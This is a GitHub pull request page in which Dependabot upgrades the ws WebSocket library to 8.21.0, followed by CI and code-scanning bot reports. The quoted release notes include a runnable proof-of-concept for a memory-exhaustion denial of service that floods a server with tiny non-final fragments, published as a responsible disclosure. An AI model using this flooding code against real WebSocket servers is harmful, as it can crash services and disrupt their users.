Skip to content

chore(deps): bump ws from 8.20.1 to 8.21.0 in /Projects/JavaScript/airtel-voip-client in the npm_and_yarn group across 1 directory#415

Merged
skanda890 merged 1 commit into
mainfrom
dependabot/npm_and_yarn/Projects/JavaScript/airtel-voip-client/npm_and_yarn-b3b4accef5
Jun 25, 2026
Merged

chore(deps): bump ws from 8.20.1 to 8.21.0 in /Projects/JavaScript/airtel-voip-client in the npm_and_yarn group across 1 directory#415
skanda890 merged 1 commit into
mainfrom
dependabot/npm_and_yarn/Projects/JavaScript/airtel-voip-client/npm_and_yarn-b3b4accef5

Conversation

@dependabot

@dependabot dependabot Bot commented on behalf of github Jun 22, 2026

Copy link
Copy Markdown
Contributor

Bumps the npm_and_yarn group with 1 update in the /Projects/JavaScript/airtel-voip-client directory: ws.

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

  • Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

  • Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.

import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions
    You can disable automated security fix PRs for this repo from the Security Alerts page.

Bumps the npm_and_yarn group with 1 update in the /Projects/JavaScript/airtel-voip-client directory: [ws](https://github.com/websockets/ws).


Updates `ws` from 8.20.1 to 8.21.0
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@8.20.1...8.21.0)

---
updated-dependencies:
- dependency-name: ws
  dependency-version: 8.21.0
  dependency-type: direct:production
  dependency-group: npm_and_yarn
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot Bot added dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code labels Jun 22, 2026
@netlify

netlify Bot commented Jun 22, 2026

Copy link
Copy Markdown

Deploy Preview for silver-entremet-633411 failed.

Name Link
🔨 Latest commit 41a2de8
🔍 Latest deploy log https://app.netlify.com/projects/silver-entremet-633411/deploys/6a3951610962090008113ec1

@codeant-ai

codeant-ai Bot commented Jun 22, 2026

Copy link
Copy Markdown
Contributor

Skipping PR review because a bot author is detected.

If you want to trigger CodeAnt AI, comment @codeant-ai review to trigger a manual review.

@skanda890

Copy link
Copy Markdown
Owner

Snyk checks have passed. No issues have been found so far.

Status Scan Engine Critical High Medium Low Total (0)
Open Source Security 0 0 0 0 0 issues

💻 Catch issues earlier using the plugins for VS Code, JetBrains IDEs, Visual Studio, and Eclipse.

@github-actions

Copy link
Copy Markdown

Dependency Review

✅ No vulnerabilities or license issues or OpenSSF Scorecard issues found.

OpenSSF Scorecard

PackageVersionScoreDetails
npm/ws 8.21.0 🟢 5.5
Details
CheckScoreReason
Dangerous-Workflow🟢 10no dangerous workflow patterns detected
Code-Review⚠️ 0Found 1/29 approved changesets -- score normalized to 0
Maintained🟢 1013 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10
Token-Permissions🟢 10GitHub workflow tokens follow principle of least privilege
Packaging⚠️ -1packaging workflow not detected
Security-Policy🟢 10security policy file detected
Pinned-Dependencies⚠️ 0dependency not pinned by hash detected -- score normalized to 0
Binary-Artifacts🟢 10no binaries found in the repo
CII-Best-Practices⚠️ 0no effort to earn an OpenSSF best practices badge detected
License🟢 10license file detected
Fuzzing⚠️ 0project is not fuzzed
Branch-Protection⚠️ 0branch protection not enabled on development/release branches
Signed-Releases⚠️ -1no releases found
SAST⚠️ 0SAST tool is not run on all commits -- score normalized to 0

Scanned Files

  • Projects/JavaScript/airtel-voip-client/package-lock.json

@mergify

mergify Bot commented Jun 22, 2026

Copy link
Copy Markdown

Tick the box to add this pull request to the merge queue (same as @mergifyio queue).

  • Queue this pull request

@deepsource-io

deepsource-io Bot commented Jun 22, 2026

Copy link
Copy Markdown
Contributor

DeepSource Code Review

We reviewed changes in b9c26c7...41a2de8 on this pull request. Below is the summary for the review, and you can see the individual issues we found as inline review comments.

See full review on DeepSource ↗

PR Report Card

Overall Grade   Security  

Reliability  

Complexity  

Hygiene  

Code Review Summary

Analyzer Status Updated (UTC) Details
Code coverage Jun 22, 2026 3:15p.m. Review ↗
Terraform Jun 22, 2026 3:15p.m. Review ↗
Swift Jun 22, 2026 3:15p.m. Review ↗
SQL Jun 22, 2026 3:15p.m. Review ↗
Shell Jun 22, 2026 3:15p.m. Review ↗
Secrets Jun 22, 2026 3:15p.m. Review ↗
Scala Jun 22, 2026 3:15p.m. Review ↗
Ruby Jun 22, 2026 3:15p.m. Review ↗
PHP Jun 22, 2026 3:15p.m. Review ↗
Kotlin Jun 22, 2026 3:15p.m. Review ↗
Go Jun 22, 2026 3:15p.m. Review ↗
Docker Jun 22, 2026 3:15p.m. Review ↗
Ansible Jun 22, 2026 3:15p.m. Review ↗
Rust Jun 22, 2026 3:15p.m. Review ↗
C# Jun 22, 2026 3:15p.m. Review ↗
C & C++ Jun 22, 2026 3:15p.m. Review ↗
Java Jun 22, 2026 3:15p.m. Review ↗
JavaScript Jun 22, 2026 3:15p.m. Review ↗
Python Jun 22, 2026 3:15p.m. Review ↗

Important

AI Review is run only on demand for your team. We're only showing results of static analysis review right now. To trigger AI Review, comment @deepsourcebot review on this thread.

@codacy-production

Copy link
Copy Markdown

Up to standards ✅

🟢 Issues 0 issues

Results:
0 new issues

View in Codacy

🟢 Metrics 0 complexity · 0 duplication

Metric Results
Complexity 0
Duplication 0

View in Codacy

NEW Get contextual insights on your PRs based on Codacy's metrics, along with PR and Jira context, without leaving GitHub. Enable AI reviewer
TIP This summary will be updated as you push new changes.

@skanda890
skanda890 merged commit ef588d2 into main Jun 25, 2026
48 of 73 checks passed
@skanda890
skanda890 deleted the dependabot/npm_and_yarn/Projects/JavaScript/airtel-voip-client/npm_and_yarn-b3b4accef5 branch June 25, 2026 03:59
@sonarqubecloud

Copy link
Copy Markdown

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

dependencies Pull requests that update a dependency file javascript Pull requests that update javascript code

Projects

None yet

Development

Successfully merging this pull request may close these issues.

1 participant